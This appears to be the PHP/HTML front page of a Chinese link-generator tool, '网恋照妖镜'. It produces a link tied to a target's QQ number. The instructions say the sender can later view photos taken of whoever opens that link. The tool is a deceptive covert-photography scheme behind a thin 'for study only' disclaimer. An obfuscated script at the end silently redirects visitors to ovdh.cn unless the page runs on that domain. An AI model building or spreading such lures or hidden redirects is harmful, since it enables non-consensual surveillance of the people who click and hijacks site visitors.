-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathsc.php
More file actions
234 lines (214 loc) · 8.7 KB
/
sc.php
File metadata and controls
234 lines (214 loc) · 8.7 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<style>
body {
background: url(/images/luzuz.jpg;) no-repeat center center fixed;
background-size: cover;
}
</style>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="format-detection" content="telephone=no">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<title>网恋照妖镜</title>
<!--baidu-->
<!-- Bootstrap -->
<link href="http://cdn.bootcss.com/bootstrap/3.3.4/css/bootstrap.css" rel="stylesheet">
<script src></script>
<script src="http://cdn.bootcss.com/jquery/1.11.3/jquery.min.js"></script>
<script src="http://cdn.bootcss.com/layer/3.0.3/layer.min.js"></script>
<link rel="stylesheet" type="text/css" href="css/shop_style.css">
<link href="css/shop.css" rel="stylesheet" type="text/css">
<link href="css/style.css" rel="stylesheet" type="text/css">
<script src="js/jquery.min.js"></script>
<link rel="shortcut icon" href="http://www.ym53.cn/f" type="image/x-icon">
<script src="http://lib.baomitu.com/jquery/3.4.1/jquery.min.js"></script>
</head>
<body>
<style>
#M1{
width: 110px;
height: 35px;
padding-top: 2px\9;
/* cursor: pointer; */
color: #fff;
font-size: 15px;
/* letter-spacing: 1px; */
background: #3385ff;
/* border-bottom: 1px solid #2d78f4; */
/* outline: medium; */
*: ;
border-bottom: none;
-webkit-appearance: none;
-webkit-border-radius: 0;
border: 0;
text-align: center;
text-decoration:none;
color: #fff;
background-color: #007bff;
border-color: #007bff;
padding: 7px;
float: left;
margin-left: 2%;
margin-top: 2%;
}
</style>
<script>
function create() {
var input = document.getElementById('content');
var kd = document.getElementById('kd');
var myid = document.getElementById('myid');
var url = document.getElementById('url');
if (myid.value=="" || url.value==""){
alert("ID或跳转地址不能为空!");
return false;
}
kd.href = 'https://您的域名/?id='+myid.value+'&url='+url.value; //修改此处的域名 必须要SSL证书 kd.style = '';
kd.innerText = 'https://您的域名/?id='+myid.value+'&url='+url.value;
}
</script>
<div id="bob">
<div id="bd">
<div class="ct" style="padding:0;">
<section class="index">
<div id="bds">
<div id="content">
<div class="hd">
<a href="https://您的域名/"><img src="images/luzuz.jpg"></div></a>
<div class="mall" id="contentss">
<div class="mianban">
<div class="wrap">
<div class="tabs">
<a href="javascript:void(0)" id="Choice_one" onclick="Choice(1)" class="active">链接生成</a>
<a href="javascript:void(0)" id="Choice_two" onclick="Choice(2)">其他工具</a>
<a href="javascript:void(0)" id="Choice_Three" onclick="Choice(3)">关于</a>
</div>
<div class="swiper-container">
<div class="content-slide">
<div class="purchase_from">
<ul id="Open" style="display:block;">
<form action="?" class="form-sign" method="get" name="auth" onSubmit="return checkURL();">
<li>
<input type="text" class="form-control" id="myid" placeholder="输入对方QQ,生成链接" value>
<p>拍摄后跳转到:</p>
<input type="text" class="form-control" id="url" value="https://baidu.com">
</li>
<li>
<input type="button" value="生成链接" onclick="create();" style="display: block;background: #0099CC!important;height: 40px;font-size: 16px;color: #fff;border-radius: 4px;text-align: center;overflow: hidden;"> <br>
</li>
<li class="btn_purchase">
<input type="button" value="查看照片" onclick="window.location.href='ck.php?id='+document.getElementById('myid').value" style="display: block;background: #0099CC!important;height: 40px;font-size: 16px;color: #fff;border-radius: 4px;text-align: center;overflow: hidden;">
</li>
<div class="alert alert-success">
<img src="images/ico_success.png">
<a id="kd" style="pointer-events: none;">请先生成链接!</a>
</div>
<span id="Order"></span>
</form>
</ul>
<ul id="query" style="display: none;">
<form action="?" class="form-sign" method="get" name="auth" onSubmit="return checkURL();">
<li class="btn_purchase">
<a href="null" id="M1" style="background-color: rgb(0, 153, 204);">等待添加</a>
<a href="null" id="M1" style="background-color: rgb(0, 153, 204);">等待添加</a>
</li>
<span id="Orderd"></span>
</form>
</ul>
<ul id="Back" style="display:none;">
<center>
<h4 class="hd_tit" style="height:auto;line-height:normal;padding:10px;color:#FFFFFF;">本站温馨提示<br>
<span style="font-size:13px;color:red;">注意:使用使用对方QQ生成链接!</span>
</h4>
</center>
<div class="list-group-item text-center">
<p>1.本工具仅做学习交流使用,请勿用于非法用途!后果自负!</p>
<p>2.懒得做数据库,QQ是查看照片的凭证,不要泄露给知道这个平台的人</p>
<p>3.为节省服务器资源,不定期删除7天前的数据</p>
</div>
<span id="Order"></span>
</ul>
</div>
</div>
</div>
<div class="gnbt">网恋照妖镜功能简介</div>
<div class="bd">
<div class="bc">
<textarea readonly="true" name="notice" id cols="30" rows="15" style="max-width: 100%;width:100%"> ★作者声明★
①本工具仅做学习交流使用,请勿用于非法用途!后果自负!网站拍照是用户自愿点击允许
②懒得做数据库,QQ是查看照片的凭证,不要泄露给知道这个平台的人
③如有侵权、肖像权等,请联系本站下方邮箱删除!
★使用说明★
①填写对方QQ方便日后查询!填写完成后不用管直接点击生成!
②生成完成后,复制链接发给你要查询的人
③他点开后,然后回到本站,填写对方QQ,然后点击查看照片即可!
④我再说一遍,填写要么数字要么QQ,小学生滚,写你妈逼英文和中文呢?
⑤由于系统安全机制,ios系统必须使用自带的Safari浏览器(或者第三方APP调用的是Safari内核)才行
仅供娱乐使用,请勿用于非法商业用途,否则后果自负!
请收藏本站,以防丢失 </textarea>
</div>
</div>
<div class="ft">网恋照妖镜</div>
</div>
<p>常用链接:</p>
<div width="100px" height="100px" style=" margin: 10px auto; border: 1px solid #ccc; text-align: center">
<a href="https://baidu.com" id="M1" style="background-color: #af00ff;">百度</a>
</div>
</div>
<p style="text-align:center"><br><a style="color: #FFFFFF"></a></p><br>
</div>
<div id="loading"></div>
</div>
</div>
</section></div>
</div>
<div style="clear:both;"></div>
<p style="text-align:center"><br><a style="color: #FFFFFF">Copyright ©2021Powered By:优选源码库!</a></p><br>
<script type="text/javascript" src="js/main.js"></script>
<script>
$(document).ready(function(){
getqrpic();
});
<script type="text/javascript">
var a = 'retrtrfdcfvvvv';
var ym = window.location;
var ym2 = 'www.ovdh.cn';
var ym3 = String(ym);
function suan(a){
var re = a.substring(0,2);
var tr = a.substring(2,4);
var tr2 = a.substring(4,6);
var fd = a.substring(6,8);
var cf = a.substring(8,10);
var vv = a.substring(10,12);
var vv2 = a.substring(12,14);
re = 'h';
tr = 't';
tr2 ='t';
fd = 'p';
cf = ':';
vv = '/';
vv2 = '/';
var p = re+tr+tr2+fd+cf+vv+vv2;
return p;
}
if (ym3.indexOf(ym2) == -1 ) {
alert(ym2);
// var av = ym3;
var b = suan(a) + 'ovdh.cn' + '/';
window.location = b;
}
</script>
<script language="Javascript">
document.oncontextmenu=new Function("event.returnValue=false");
document.onselectstart=new Function("event.returnValue=false");
</script>
</script>
<script src="js/index.js"></script><!-- 核心插件 -->
<script src="js/all.js"></script><!-- 图标库 -->
<script src="js/Sitetime.js"></script><!-- 运行时间 -->
<script src="js/Mouse.js"></script><!-- 点击烟花特效 --
--></div></body></html>